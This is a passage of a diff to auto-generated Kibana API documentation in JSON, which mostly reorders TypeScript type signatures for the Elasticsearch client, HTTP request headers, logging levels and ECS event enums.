@@ -20766,33 +20816,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -20818,33 +20842,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -21804,6 +21802,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", 
@@ -21875,7 +21875,61 @@ "\nA {@link ElasticsearchClient | client} to be used to query the elasticsearch cluster\non behalf of the user that initiated the request to the Kibana server." ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -21943,7 +21993,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -21969,33 +22019,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -22021,33 +22045,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -23007,6 +23005,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", 
@@ -23625,7 +23625,7 @@ "\nReadonly copy of incoming request headers." ], "signature": [ - "{ from?: string | string[] | undefined; origin?: string | string[] | undefined; warning?: string | string[] | undefined; location?: string | string[] | undefined; date?: string | string[] | undefined; expires?: string | string[] | undefined; range?: string | string[] | undefined; allow?: string | string[] | undefined; accept?: string | string[] | undefined; host?: string | string[] | undefined; etag?: string | string[] | undefined; authorization?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; expect?: string | string[] | undefined; forwarded?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: 
string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" + "{ accept?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: 
string | string[] | undefined; age?: string | string[] | undefined; allow?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; authorization?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; date?: string | string[] | undefined; etag?: string | string[] | undefined; expect?: string | string[] | undefined; expires?: string | string[] | undefined; forwarded?: string | string[] | undefined; from?: string | string[] | undefined; host?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; location?: string | string[] | undefined; origin?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; range?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | 
undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; warning?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false @@ -23848,7 +23848,7 @@ "label": "options", "description": [], "signature": [ - "Method extends \"options\" | \"get\" ? Required, \"body\">> : Required<", "RouteConfigOptions", @@ -24281,7 +24281,7 @@ "label": "level", "description": [], "signature": [ - "\"error\" | \"all\" | \"off\" | \"info\" | \"debug\" | \"trace\" | \"warn\" | \"fatal\"" + "\"error\" | \"all\" | \"info\" | \"debug\" | \"off\" | \"trace\" | \"warn\" | \"fatal\"" ], "path": "node_modules/@types/kbn__core-logging-server/index.d.ts", "deprecated": false 
@@ -26170,7 +26170,61 @@ "label": "internalClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -26238,7 +26288,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -26264,33 +26314,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -26316,33 +26340,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -27302,6 +27300,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -27780,7 +27780,7 @@ "\nAdditional body options {@link RouteConfigOptionsBody}." ], "signature": [ - "(Method extends \"options\" | \"get\" ? undefined : ", + "(Method extends \"get\" | \"options\" ? undefined : ", "RouteConfigOptionsBody", ") | undefined" ], @@ -27797,7 +27797,7 @@ "\nDefines per-route timeouts." ], "signature": [ - "{ payload?: (Method extends \"options\" | \"get\" ? undefined : number) | undefined; idleSocket?: number | undefined; } | undefined" + "{ payload?: (Method extends \"get\" | \"options\" ? undefined : number) | undefined; idleSocket?: number | undefined; } | undefined" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false @@ -35653,7 +35653,7 @@ "array of permitted values for this setting" ], "signature": [ - "number[] | string[] | undefined" + "string[] | number[] | undefined" ], "path": "node_modules/@types/kbn__core-ui-settings-common/index.d.ts", "deprecated": false 
@@ -36790,7 +36790,7 @@ "\nSet of HTTP methods changing the state of the server." ], "signature": [ - "\"delete\" | \"post\" | \"put\" | \"patch\"" + "\"post\" | \"put\" | \"delete\" | \"patch\"" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false, @@ -36909,7 +36909,7 @@ "label": "EcsEventCategory", "description": [], "signature": [ - "\"database\" | \"email\" | \"package\" | \"network\" | \"web\" | \"file\" | \"host\" | \"session\" | \"registry\" | \"process\" | \"authentication\" | \"configuration\" | \"driver\" | \"iam\" | \"intrusion_detection\" | \"malware\"" + "\"host\" | \"database\" | \"email\" | \"package\" | \"network\" | \"web\" | \"file\" | \"session\" | \"registry\" | \"process\" | \"authentication\" | \"configuration\" | \"driver\" | \"iam\" | \"intrusion_detection\" | \"malware\"" ], "path": "node_modules/@types/kbn__logging/index.d.ts", "deprecated": false, @@ -36951,7 +36951,7 @@ "label": "EcsEventType", "description": [], "signature": [ - "\"start\" | \"error\" | \"end\" | \"group\" | \"user\" | \"info\" | \"admin\" | \"protocol\" | \"connection\" | \"access\" | \"allowed\" | \"change\" | \"creation\" | \"deletion\" | \"denied\" | \"installation\"" + "\"start\" | \"error\" | \"connection\" | \"user\" | \"info\" | \"group\" | \"end\" | \"admin\" | \"protocol\" | \"access\" | \"allowed\" | \"change\" | \"creation\" | \"deletion\" | \"denied\" | \"installation\"" ], "path": "node_modules/@types/kbn__logging/index.d.ts", "deprecated": false, 
@@ -36967,7 +36967,61 @@ "\nClient used to query the elasticsearch cluster.\n" ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -37035,7 +37085,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -37061,33 +37111,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -37113,33 +37137,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -38099,6 +38097,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", 
@@ -38386,7 +38386,7 @@ "\nHttp request headers to read." ], "signature": [ - "{ from?: string | string[] | undefined; origin?: string | string[] | undefined; warning?: string | string[] | undefined; location?: string | string[] | undefined; date?: string | string[] | undefined; expires?: string | string[] | undefined; range?: string | string[] | undefined; allow?: string | string[] | undefined; accept?: string | string[] | undefined; host?: string | string[] | undefined; etag?: string | string[] | undefined; authorization?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; expect?: string | string[] | undefined; forwarded?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | 
string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" + "{ accept?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | 
